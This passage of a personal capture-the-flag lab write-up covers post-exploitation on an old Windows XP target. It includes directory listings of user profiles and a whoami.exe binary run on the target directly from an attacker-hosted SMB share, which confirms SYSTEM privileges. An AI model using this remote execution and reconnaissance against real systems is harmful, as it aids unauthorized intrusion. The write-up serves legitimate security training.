whoami.exe

Although I have gained a foothold on to the target system, I have yet to find out who I am due to the target system being extremely old. The whoami.exe binary was not supplied to Windows XP by default

c:\WINDOWS\system32> echo %USERNAME%
%USERNAME%
 
c:\WINDOWS\system32> set USERNAME
Environment variable USERNAME not defined

Environment variable wasn’t even set..

c:\> dir "Documents and Settings"
 dir "Documents and Settings"
 Volume in drive C has no label.
 Volume Serial Number is 54BF-723B
 
 directory of c:\Documents and Settings
 
16/03/2017  09:07 ��    <DIR>          .
16/03/2017  09:07 ��    <DIR>          ..
16/03/2017  09:07 ��    <DIR>          Administrator
16/03/2017  08:29 ��    <DIR>          All Users
16/03/2017  08:33 ��    <DIR>          john
               0 File(s)              0 bytes
               5 Dir(s)   6.325.542.912 bytes free

the c:\Documents and Settings directory is where user’s home directories are located in Windows XP There are home directories for thejohn and Administrator user

c:\Documents and Settings> tree /F /A Administrator
 tree /F /A Administrator
Folder PATH listing
volume serial number is 00000072 54bf:723B
c:\DOCUMENTS AND SETTINGS\ADMINISTRATOR
+---Desktop
|       root.txt
|       
+---Favorites
|   |   MSN.com.url
|   |   Radio Station Guide.url
|   |   
|   \---Links
|           Customize Links.url
|           Free Hotmail.url
|           Windows Marketplace.url
|           Windows Media.url
|           Windows.url
|           
+---My Documents
|   +---My Music
|   |       Sample Music.lnk
|   |       
|   \---My Pictures
|           Sample Pictures.lnk
|           
\---Start Menu
    \---Programs
        |   Internet Explorer.lnk
        |   Outlook Express.lnk
        |   Remote Assistance.lnk
        |   Windows Media Player.lnk
        |   
        +---Accessories
        |   |   Address Book.lnk
        |   |   Command Prompt.lnk
        |   |   Notepad.lnk
        |   |   Program Compatibility Wizard.lnk
        |   |   Synchronize.lnk
        |   |   Tour Windows XP.lnk
        |   |   Windows Explorer.lnk
        |   |   
        |   +---Accessibility
        |   |       Magnifier.lnk
        |   |       Narrator.lnk
        |   |       On-Screen Keyboard.lnk
        |   |       Utility Manager.lnk
        |   |       
        |   \---Entertainment
        |           Windows Media Player.lnk
        |           
        \---Startup

The fact that I am able to list out the home directory of the administrator user suggests that I am the administrator user

Confirmation

┌──(kali㉿kali)-[~/archive/htb/labs/legacy]
└─$ locate -i whoami.exe
/home/kali/.wine/drive_c/windows/system32/whoami.exe
/home/kali/.wine/drive_c/windows/syswow64/whoami.exe
/usr/lib/i386-linux-gnu/wine/i386-windows/whoami.exe
/usr/lib/x86_64-linux-gnu/wine/x86_64-windows/whoami.exe
/usr/share/windows-resources/binaries/whoami.exe

Kali comes with many Windows binaries for testing, whoami.exe is also one of them

C:\WINDOWS\system32>\\10.10.14.2\smb\whoami.exe /all
[User]     = "NT AUTHORITY\SYSTEM"  S-1-5-18
 
[Group  1] = "BUILTIN\Administrators"  S-1-5-32-544
[Group  2] = "Everyone"  S-1-1-0
[Group  3] = "NT AUTHORITY\Authenticated Users"  S-1-5-11
 
 
(X) SeTcbPrivilege                 = Act as part of the operating system
(X) SeCreateTokenPrivilege          = Create a token object
(X) SeTakeOwnershipPrivilege        = Take ownership of files or other objects
(X) SeCreatePagefilePrivilege       = Create a pagefile
(X) SeLockMemoryPrivilege           = Lock pages in memory
(X) SeAssignPrimaryTokenPrivilege   = Replace a process level token
(X) SeIncreaseQuotaPrivilege        = Adjust memory quotas for a process
(X) SeIncreaseBasePriorityPrivilege = Increase scheduling priority
(X) SeCreatePermanentPrivilege      = Create permanent shared objects
(X) SeDebugPrivilege                = Debug programs
(X) SeAuditPrivilege                = Generate security audits
(X) SeSecurityPrivilege             = Manage auditing and security log
(X) SeSystemEnvironmentPrivilege    = Modify firmware environment values
(X) SeChangeNotifyPrivilege         = Bypass traverse checking
(X) SeBackupPrivilege               = Back up files and directories
(X) SeRestorePrivilege              = Restore files and directories
(X) SeShutdownPrivilege             = Shut down the system
(X) SeLoadDriverPrivilege           = Load and unload device drivers
(X) SeProfileSingleProcessPrivilege = Profile single process
(X) SeSystemtimePrivilege           = Change the system time
(X) SeUndockPrivilege               = Remove computer from docking station
(X) SeManageVolumePrivilege         = Perform volume maintenance tasks
(X) SeImpersonatePrivilege          = Impersonate a client after authentication
(X) SeCreateGlobalPrivilege         = Create global objects

Executing thewhoami.exe binary confirms that I am the SYSTEM System Level Compromise

InfoSec LAB

Explorer

Legacy_whoami

whoami.exe

Confirmation

Interactive Graph View

Table of Contents

Backlinks